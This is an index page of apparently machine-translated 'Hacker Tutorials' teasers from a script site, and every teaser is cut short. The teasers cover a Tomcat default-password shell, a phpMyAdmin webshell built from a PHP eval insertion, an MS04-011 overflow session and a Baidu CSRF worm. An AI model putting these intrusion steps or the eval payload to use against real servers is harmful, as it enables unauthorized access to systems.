Script Home
  • Baidu Hi Csrf worm attack

    +Read more
    Author:zyq / Release:2013-8-10 / category:Hacker Tutorials / crowd0 views time+ / sofa /
    Holes cause: is the nation's largest Chinese search engine baidu. Baidu also provides the baidu space, baidu post bar, such as blogs, community service, with vast user base, billed as the world's largest Chinese communities. 80 SEC found a product that baidu a series of security vulnerabilities, ...
  • Tomcat background with shell

    +Read more
    Author:zyq / Release:2013-8-10 / category:Hacker Tutorials / crowd0 views time+ / sofa /
    After some Tomcat installation did not change the default password (admin user name, password is empty), so that you can log in directly. there are two directory access:/admin/manager/HTMLThe use of /admin directory: Service - host - actions - Create New Context based virtual directory Document B...
  • Teach you how to take webshell phpMyAdmin backstage

    +Read more
    Author:zyq / Release:2013-8-10 / category:Hacker Tutorials / crowd9 views time+ / sofa /
    1. How to get the password, to find a way to myself. 2. Visit: http://url/phpmyadmin/libraries/select_lang.lib.php to get physical path. 3. Select a Database, run the following statement. - start code - Create TABLE a (CMD text NOT NULL). Insert INTO a (CMD) VALUES (the ' <? PHP eval ($_...
  • The five kinds of most hackers like network password

    +Read more
    Author:zyq / Release:2013-8-10 / category:Hacker Tutorials / crowd0 views time+ / sofa /
    Now most of enterprise network equipment and application software, relied on password to ensure the safety. If the password is lost, it is conceivable that will bring how much risk to the enterprise network security, may be in imperceptible in, the enterprise became the hacker's chicken in the ne...
  • The commonly used method to introduce hacking Windows XP

    +Read more
    Author:zyq / Release:2013-8-10 / category:Hacker Tutorials / crowd1 views time+ / sofa /
    The first recruit, screen protection is enabled in the Windows screensaver, as long as we leave the computer operate computers (or not) the time to reach the preset time, the system will automatically start the screen saver, and when the user moves the mouse or keyboard to return to normal worki...
  • System vulnerabilities overflow attack instances

    +Read more
    Author:zyq / Release:2013-8-10 / category:Hacker Tutorials / crowd0 views time+ / sofa /
    Before we look at the more classic example of an overflow ms04011 overflow: Microsoft Windows XP version 5.1.2600 [] (C) all rights reserved 1985-2001 Microsoft Corp. C: \ Windows \ \ system32 \ CD C: \ > C: \ >Getos 2 * * 159.31.96 judging (operating system) -- -- -- -- -- -- -- -- -- -- -...
  • The hacker’s script vulnerability analysis tools

    +Read more
    Author:zyq / Release:2013-8-10 / category:Hacker Tutorials / crowd1 views time+ / sofa /
    above are only tools of a web site of the injection point detection, and the result of that, of course, see the password for the 16 md5 and password, but we can break through the md5 password cracking tools. Then use the find the background of the user name and password to log in. For malware, ...
  • Described in detail how to capture network packets

    +Read more
    Author:zyq / Release:2013-8-10 / category:Hacker Tutorials / crowd1 views time+ / sofa /
    Before the word Often see BBS someone asks about packet interception, analysis and other issues, fortunately, I also had some inkling of this, also wrote many sniffers, so I want to write a series of articles to discuss in detail about the packet. I hope that through this series of articles, can ...
  • The anti-spam technology secret path tracking

    +Read more
    Author:zyq / Release:2013-8-10 / category:Hacker Tutorials / crowd0 views time+ / sofa /
    China's Internet users has exceeded 100 million, the E-mail sent 50 billion letters a year, but this data is not to our surprise, because in the 50 billion emails, nearly 60%, that is, 30 billion is a junk mail. Spam has become a comprehensive social problems, in order to fundamentally eliminate...

0Wide search 1Web Design 2Script 3Network Programming 4Database 5Operating system 6Network Security